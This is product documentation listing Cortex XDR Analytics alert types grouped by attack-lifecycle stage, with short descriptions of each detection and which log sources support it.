Analytics Alert Types

Cortex XDR Analytics alerts grouped by attack category.
Cortex XDR Analytics alerts are categorized by individual steps in the attack lifecycle.
The alerts you see in Cortex XDR depend on the log sources you set up. For example if you use agent endpoint data as the only data source, the app raises only the alerts it can detect from Cortex XDR agent endpoint data.
The alerts the app can raise are:
Palo Alto Networks
External
Alert
Firewall Traffic Logs
Firewall EAL Logs
GlobalProtect and Prisma Access Logs
Cortex XDR Agent Endpoint Data
Check Point, Cisco, and Fortinet Firewall Traffic Logs
Windows Event Collector Logs
Execution
Grayware
The app identified a suspicious file based on network traffic that the file is generating, threat intelligence, or prevalence of the file across endpoints on your network, or based on endpoint activity provided by the Cortex XDR agent. Automated investigation of the file by WildFire identified the file as grayware.
check-mark.png
check-mark.png
check-mark.png
Malware
The app has identified a suspicious file on an endpoint in the network based on threat intelligence, based on the file generating suspicious network traffic, or endpoint activity logged by the Cortex XDR agent. Automated investigation of the file by WildFire identified the file as malware.
check-mark.png
check-mark.png
check-mark.png
check-mark.png
Rare WinRM Session
The app detected a process performed a rare Windows Remote Management (WinRM) session to a remote endpoint and port.
check-mark.png
Script Connecting to Rare External Host
The app identified a Windows Script Host (wscript.exe, cscript.exe, powershell.exe) connecting to an uncommon external endpoint.
check-mark.png
scrons.exe Rare Child Process
The app identified that scrons.exe spawned a child process on an endpoint, which may indicate remote code execution abuse by an attacker.
check-mark.png
SpamBot Traffic
A non-SMTP-based device that appears to be sending SPAM.
check-mark.png
check-mark.png
check-mark.png
check-mark.png
check-mark.png
Suspicious PowerShell Command Line
The app identified when PowerShell is executed with a suspicious command line which may include command obfuscation, encoding, or reflective assembly loading.
check-mark.png
Uncommon Remote Scheduled Task Creation via schtasks.exe
The app identified the uncommon scheduling of a task on a remote endpoint.
check-mark.png
Uncommon Remote Service Start via sc.exe
The app identified that the Service Control (sc.exe) command was used to start a remote service.
check-mark.png
Uncommon Service Create/Config
The app identified that the Service Control (sc.exe) command was used to create a new service or configure an existing one.
check-mark.png
Persistence
Uncommon Local Scheduled Task Creation via schtasks.exe
The app detected an uncommon locally scheduled task on an endpoint.
check-mark.png
Uncommon Net User
The app detected that the net user command was executed on an endpoint.
check-mark.png
Uncommon Net User
The app detected that the net user command was executed on an endpoint.
check-mark.png
Discovery
Failed Connections
The Cortex XDR Analytics app detected a endpoint which is generating an abnormally high level of failed connections to other endpoints that have been inactive for a long time or that were never on the network to begin with.
check-mark.png
check-mark.png
Increases accuracy
check-mark.png
check-mark.png
check-mark.png
High Connection Rate
The app has identified a number of successful connections to a susceptible port list at a rate that is unusual when compared to the baseline. This could be the consequence of an attacker scraping a endpoint for data or attempting a brute force user and password combination attack.
check-mark.png
check-mark.png
check-mark.png
Port Scan
The app detected port-scanning activity, the amount of which exceeds the baseline for that endpoint and endpoint type.
check-mark.png
check-mark.png
check-mark.png
check-mark.png
Uncommon ARP Cache Listing via arp.exe
The app detected an uncommon listing of the ARP cache through the arp.exe command on an endpoint.
check-mark.png
Suspicious PowerShell Enumeration of Running Processes
The app detected a command executed in PowerShell that enumerates running processes.
check-mark.png
Uncommon IP Configuration Listing via ipconfig.exe
The app detected that the ipconfig command was used on an endpoint to list the IP address configuration for all devices to determine network configuration details.
check-mark.png
Uncommon Routing Table Listing via route.exe
The app detected the route.exe command was used to display or modify the local IP address routing table.
check-mark.png
Uncommon Net Group Execution
The detected that the net group command was used on an endpoint the command is not commonly used on.
check-mark.png
Uncommon net localgroup Execution
The app detected that the net localgroup command was used on an endpoint.
check-mark.png
Uncommon Net User
The app detected that the net user command was executed on an endpoint.
check-mark.png
Lateral Movement
High Connection Rate
The app has identified a number of successful connections to a susceptible port list at a rate that is unusual when compared to the baseline. This could be the consequence of an attacker scraping an endpoint for data or attempting a brute force user and password combination attack.
This alert can also be related to a discovery attack tactic of your network.
check-mark.png
check-mark.png
check-mark.png
New Administrative Behavior
The app detected administrative activities from a endpoint that does not usually engage in that behavior, which typically means that an attacker is trying to move laterally across the network.
This alert can also be related to an attacker's reconnaissance of your network.
check-mark.png
check-mark.png
Increases accuracy
check-mark.png
check-mark.png
(Limited)
check-mark.png
Rare SSH Session
The app detected a process performed a rare Secure Shell (SSH) session using NT AUTHORITY\SYSTEM privileges to a remote endpoint and port.
check-mark.png
Rare WinRM Session
The app detected a process performed a rare Windows Remote Management (WinRM) session to a remote endpoint and port.
check-mark.png
Remote Command Execution
The app detected an account using remote command execution from a endpoint which historically does not perform that activity.
check-mark.png
check-mark.png
Increases accuracy
check-mark.png
SMB/KRB Traffic from Non-Standard Process
The app detected a process that is connecting over ports normally used by SMB or Kerberos. Either the process is using a custom protocol implementation or is not using the expected protocol.
check-mark.png
check-mark.png
check-mark.png
wmiprsve.exe Rare Child Process
The app detected a remote WMI command executed a binary proxy, wmiprvse.exe, which executed a rare child process.
check-mark.png
wsmprovhost.exe Rare Child Process
The app detected a remote WMI command executed a binary proxy, wsmprovhost.exe, which executed a rare child process.
check-mark.png
Command and Control Alerts
DNS Tunneling
The app detected an endpoint sending and receiving anomalous DNS queries and responses.
check-mark.png
check-mark.png
check-mark.png
Failed DNS
The app detected an endpoint that is performing an unusually large number of failed DNS resolutions when compared to its peer group.
check-mark.png
check-mark.png
check-mark.png
Random Looking DNS
The app detected an endpoint that is performing DNS lookups to a large number of unique and apparently random root domain names.
check-mark.png
check-mark.png
check-mark.png
Recurring Rare Domain Access
The app detected an endpoint that is connecting repeatedly to an external domain in a way that suggests the remote domain is performing malware command and control activity.
check-mark.png
check-mark.png
check-mark.png
Recurring Rare IP Access
The app detected an endpoint that is connecting repeatedly to an external IP address in a way that suggests the remote endpoint is performing malware command and control activity.
check-mark.png
check-mark.png
check-mark.png
check-mark.png
check-mark.png
Tunneling Process
The app detected an endpoint that has open internal ports at the same time that it is communicating with a destination on the internet.
check-mark.png
check-mark.png
check-mark.png
LOLBIN Connecting to a Rare Host
The app detected a living-off-the-land binary which is communicating with an external host or domain rarely accessed by hosts in your organization.
check-mark.png
Exfiltration
DNS Tunneling
The app detected an endpoint sending and receiving anomalous DNS queries and responses.
check-mark.png
check-mark.png
check-mark.png
Large Upload (FTP)
The app detected excessively large data transfers over FTP from a source that is not an FTP server.
check-mark.png
check-mark.png
Increases accuracy
check-mark.png
Large Upload (Generic)
The app detected abnormally large data traffic to an external destination. The traffic is generic in that it is not HTTP(s), FTP, or SMTP.
check-mark.png
check-mark.png
Increases accuracy
check-mark.png
check-mark.png
Large Upload (HTTPS)
The app detected excessively large data transfers over HTTPS from a source that is not an HTTP server.
check-mark.png
check-mark.png
check-mark.png
Large Upload (SMTP)
The app detected abnormally large data transfers over SMTP, compared to historical traffic amounts for machines of this type.
check-mark.png
check-mark.png
Increases accuracy
check-mark.png
Rare SMTP/S Session
The app detected a process performing a rare Simple Mail Transfer Protocol (SMTP/S) session to a remote endpoint and port.
check-mark.png
Initial Access
Microsoft Office Process Spawning a Suspicious One-Liner
The app detected a Microsoft Office processes spawned a suspicious command.
check-mark.png
Credential Access
Possible DC Sync Attempt
The app detected Active Directory replication between a domain controller (DC) and a host which is not a DC.
check-mark.png
check-mark.png
check-mark.png
Failed Login for a Long Username with Special Characters
The app detected a user with a long username (more than 15 characters) and containing special characters attempted to log in to the domain and failed, because it does not appear in the Kerberos database.
check-mark.png
check-mark.png
check-mark.png
Kerberos Pre-Auth Failures by Host
The app detected a suspicious number of failed authentication attempts from multiple users which can indicate a possible password-spraying attack.
check-mark.png
check-mark.png
check-mark.png
Kerberos Pre-Auth Failures by User and Host
The app detected a suspicious number of failed authentication attempts from a single user and host.
check-mark.png
check-mark.png
check-mark.png
Weakly-Encrypted Kerberos Ticket Requested
The app detected a user when a weakly-encrypted Kerberos ticket-granting service (TGS) was requested and could potentially be cracked.
check-mark.png
check-mark.png
check-mark.png
check-mark.png
Multiple Weakly-Encrypted Kerberos Tickets Received
The app detected a user accessing multiple services associated with user accounts, which it did not access before, over a short period of time.
check-mark.png
check-mark.png
check-mark.png
Possible Search For Password Files
The app detected a possible search for files that have passwords in them.
check-mark.png
Possible DCShadow Attempt
The app detected Active Directory replication that is taking place between a domain controller (DC) and a host which is not a DC.
check-mark.png
check-mark.png
check-mark.png
Defense Evasion
Authentication Attempt From a Dormant Account
The app detected a user account which has been dormant for a year or more is trying to authenticate to a service using a Kerberos TGT (ticket granting ticket).
check-mark.png
check-mark.png
check-mark.png
check-mark.png
Failed Login For Locked-Out Account
The app detected a revoked user account that is trying to authenticate using Kerberos pre-authentication.
check-mark.png
check-mark.png
check-mark.png
check-mark.png
Delayed Deletion of Files
The app detected a command line deleting files that used the timeout or ping commands to delay the file deletion.
check-mark.png
Possible DCShadow Attempt
The app detected Active Directory replication that is taking place between a domain controller (DC) and a host which is not a DC.
check-mark.png
check-mark.png
check-mark.png
Unicode RTL Override Character
The app detected the execution of a process whose file name contains the Unicode right-to-left override character.
check-mark.png

Recommended For You